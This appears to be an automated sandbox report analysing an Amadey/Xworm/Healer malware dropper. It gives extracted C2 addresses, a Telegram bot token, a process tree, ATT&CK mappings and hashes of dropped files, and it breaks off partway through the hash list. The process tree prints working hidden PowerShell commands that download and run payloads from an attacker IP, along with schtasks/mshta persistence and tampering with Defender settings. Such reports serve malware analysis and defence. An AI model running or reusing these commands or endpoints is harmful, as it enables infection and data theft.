Overview

overview

10

Static

static

3

88345910e7...0b.exe

windows7-x64

10

88345910e7...0b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/02/2025, 07:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    88345910e7756216c80bf4046952980b.exe

  • Size

    2.1MB

  • MD5

    88345910e7756216c80bf4046952980b

  • SHA1

    f508e862e3d2b48a83dfa064d4655035953482c0

  • SHA256

    c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704

  • SHA512

    a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845

  • SSDEEP

    49152:yhpo+E+QRPrT0O7tDr5uWwt4ZKYXhRn+lOxfMfps:yhy+xIzT0A5uruXLn+lOxfMf

Score
10/10
amadeyhealerxworm9c9aa5a4d2cddefense_evasiondiscoverydropperevasionexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz
Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Xworm Payload 3 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 12 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 44 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 3 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe
    "C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
        "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1980
      • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
        "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2460
        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe
            "C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:2632
      • C:\Users\Admin\AppData\Local\Temp\1090673001\d538f57e36.exe
        "C:\Users\Admin\AppData\Local\Temp\1090673001\d538f57e36.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1668
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2824
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:2832
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:1524
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3024
          • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
            "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2968
            • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
              "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2972
          • C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
            "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2036
          • C:\Users\Admin\AppData\Local\Temp\1091274101\45d43ed47c.exe
            "C:\Users\Admin\AppData\Local\Temp\1091274101\45d43ed47c.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:3020
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn x5Sfvmarz82 /tr "mshta C:\Users\Admin\AppData\Local\Temp\xe9pkKlfv.hta" /sc minute /mo 25 /ru "Admin" /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2144
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn x5Sfvmarz82 /tr "mshta C:\Users\Admin\AppData\Local\Temp\xe9pkKlfv.hta" /sc minute /mo 25 /ru "Admin" /f
                5⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2128
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\xe9pkKlfv.hta
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1748
                • C:\Users\Admin\AppData\Local\TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE
                  "C:\Users\Admin\AppData\Local\TempT4OORPZV2TYISC7OCKVSKVKPMNOLZOND.EXE"
                  6⤵
                  • Modifies Windows Defender DisableAntiSpyware settings
                  • Modifies Windows Defender Real-time Protection settings
                  • Modifies Windows Defender TamperProtection settings
                  • Modifies Windows Defender notification settings
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Windows security modification
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2004
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1028
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1512
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                5⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1728
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2832
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2680
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2844
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1644
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1468
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2064
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "hfCdemaMOqf" /tr "mshta \"C:\Temp\abF2hyqJi.hta\"" /sc minute /mo 25 /ru "Admin" /f
                5⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2984
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\abF2hyqJi.hta"
                5⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2160
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1604
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    7⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2228
          • C:\Users\Admin\AppData\Local\Temp\1091320001\4ec3a9fcdf.exe
            "C:\Users\Admin\AppData\Local\Temp\1091320001\4ec3a9fcdf.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1020
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2748
          • C:\Users\Admin\AppData\Local\Temp\1091321001\e128512ea8.exe
            "C:\Users\Admin\AppData\Local\Temp\1091321001\e128512ea8.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1468
          • C:\Users\Admin\AppData\Local\Temp\1091322001\83f03064e5.exe
            "C:\Users\Admin\AppData\Local\Temp\1091322001\83f03064e5.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:2920
          • C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe
            "C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1028
          • C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
            "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1844
            • C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
              "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
              4⤵
                PID:1428
            • C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe
              "C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1596
            • C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe
              "C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2684
            • C:\Users\Admin\AppData\Local\Temp\1091328001\712a5812b7.exe
              "C:\Users\Admin\AppData\Local\Temp\1091328001\712a5812b7.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2956
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                  PID:2900
              • C:\Users\Admin\AppData\Local\Temp\1091329001\d842b69899.exe
                "C:\Users\Admin\AppData\Local\Temp\1091329001\d842b69899.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3020
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  4⤵
                    PID:1620
                • C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1624

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            4
            T1543

            Windows Service

            4
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Create or Modify System Process

            4
            T1543

            Windows Service

            4
            T1543.003

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            Impair Defenses

            5
            T1562

            Disable or Modify Tools

            5
            T1562.001

            Modify Registry

            8
            T1112

            Subvert Trust Controls

            1
            T1553

            Install Root Certificate

            1
            T1553.004

            Virtualization/Sandbox Evasion

            2
            T1497

            Credential Access

            Unsecured Credentials

            1
            T1552

            Credentials In Files

            1
            T1552.001

            Discovery

            Query Registry

            4
            T1012

            System Information Discovery

            2
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            Virtualization/Sandbox Evasion

            2
            T1497

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Command and Control

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Temp\abF2hyqJi.hta
              Filesize

              782B

              MD5

              16d76e35baeb05bc069a12dce9da83f9

              SHA1

              f419fd74265369666595c7ce7823ef75b40b2768

              SHA256

              456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

              SHA512

              4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
              Filesize

              2.8MB

              MD5

              0658a83d9b5dbbc9dd5bf50c1efbbf1a

              SHA1

              6ef596985aa7da0170706e9a0a71a9189534f66c

              SHA256

              567ed55e81371392654e71e8769ff899ef92b1c28d1deb4bbde3219a8872ec00

              SHA512

              2751bde5b88526f5caddabdbb5ce7214480e1d552b0aeae5888db02d8818a8c2bf71d5e6927cc22097ca62f206b98c6540a019bdb5ca2aa1fcc13260e3546a3c

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
              Filesize

              2.1MB

              MD5

              817caec31605801a67c847f63ce7bb20

              SHA1

              f023444245b780be58b0c6672a56a7deb8597424

              SHA256

              162d2eec1e9bbec8f7e160053cf1ea77f080c24df69ac427f474e468f955d1b6

              SHA512

              ca8abae689f303dab56eeaa8b29b89498c193693563c6fcd2419faf514062865c64b3e9894ec19e923051d458736f1b5efa28234e21ea7acc2ada881aa2fa936

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1090673001\d538f57e36.exe
              Filesize

              6.6MB

              MD5

              6ea2a7f9508369885220226be0fd705d

              SHA1

              030757e8417498cf85867fe46f59ca6b6cf1498f

              SHA256

              6f024c0d869fe42a3da00c477b0234fb97dc6d4d576c4e897ddfc062add40478

              SHA512

              7d1bfeb83555004c930f2680482ab5fc6dde6e37ab067d0303a19b6bb9d2b4d59cc219e6bb4533f424dd5fcedbeff9930698049153b866a7434a0bd08500df3e

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
              Filesize

              2.1MB

              MD5

              d59903af15c5257c5e274b297bec5e6d

              SHA1

              1d84da470c7821a2dbcc9a788e720a4bce32c8c4

              SHA256

              879785b2c857249d89f97b79ccb4ce25bbb8d1c60f4d003a23fdf1913f40fa2d

              SHA512

              2ab588a14cd70fa5684d1c82d13ddf48037499b7742fe7af5408044b0776ca4610a9f3780ad2fc302a03d7ce90932219b619fa117e33bfc5f0e860c2663dd42c

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
              Filesize

              173KB

              MD5

              a43d79a6456eefe4bc9fee38bfe7b8f7

              SHA1

              8f8d0183e4ed13ed8ba02e647705b0782ca65061

              SHA256

              94c256f4b3313e68f351ceabccc2dcdf81583f118d0e8ccbac74e8165bbf3047

              SHA512

              7cdb870740e1f7d5aa1103d060eb31336c6634f13b02cc17dced0b462f5a7088934cdd327e86e8e2b9bb01fc300787cb16c5f353cf70afd237c1a9d53bf6f093

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091274101\45d43ed47c.exe
              Filesize

              938KB

              MD5

              10a6cfd531ece3f71e12475d5c488ee9

              SHA1

              1a2027c8e952a6fd22df4c90d825d5dbe6c3b8c3

              SHA256

              ccf681411e97a18837a423cd39c48bc0da49725cc438d7fa88823b0595108caf

              SHA512

              a9be1716c5626691680614211f1ead8647dc85cb9c4d0c0bd20ce31a5e8d40c6674a942ea7f5faddc9b7da444ac225abd77ef81833820f6897caf66b702a50d0

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd
              Filesize

              2KB

              MD5

              189e4eefd73896e80f64b8ef8f73fef0

              SHA1

              efab18a8e2a33593049775958b05b95b0bb7d8e4

              SHA256

              598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

              SHA512

              be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091320001\4ec3a9fcdf.exe
              Filesize

              9.8MB

              MD5

              db3632ef37d9e27dfa2fd76f320540ca

              SHA1

              f894b26a6910e1eb53b1891c651754a2b28ddd86

              SHA256

              0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d

              SHA512

              4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091321001\e128512ea8.exe
              Filesize

              325KB

              MD5

              f071beebff0bcff843395dc61a8d53c8

              SHA1

              82444a2bba58b07cb8e74a28b4b0f715500749b2

              SHA256

              0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec

              SHA512

              1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091322001\83f03064e5.exe
              Filesize

              2.0MB

              MD5

              048e2f615e3ca2776e39e7b3784bdd56

              SHA1

              c98e7dc6b2af5775a26144a2b54b84be588a7326

              SHA256

              1071c5e337b4ef345e80be19a9d2ac590e40fb5ba04f61c903e4022b049807cb

              SHA512

              ace2ed23166664ebe8421afc4eb590691a73e017d60495396942dfa9c32a68ca2e43bd630a3eda22bab4751ecfc440be51527014f495f7073073329d9396ac67

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe
              Filesize

              816KB

              MD5

              abc22e4a762f305a1957f34be6645d16

              SHA1

              fd563e87f28c96257c8791ddedb809bd5589e9de

              SHA256

              7f66165345506f794ce8f059cdefab76ac33cbbc0b9bada2085026be4cd8e84e

              SHA512

              0ac3b23d1b3a440b271005ac08c58e043531a687fa2ff334ed3b26600f207c2b08bb0feaadb52e98bc8469c373a3334651daaf17a7975dcbd7a58900ba51268d

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe
              Filesize

              2.8MB

              MD5

              69de9fb1f2c4da9f83d1e076bc539e4f

              SHA1

              22ce94c12e53a16766adf3d5be90a62790009896

              SHA256

              0df459c85df5ee90a32edcecd4c0519c00fcf9315b9a24edc132d8cf0f6c7ef8

              SHA512

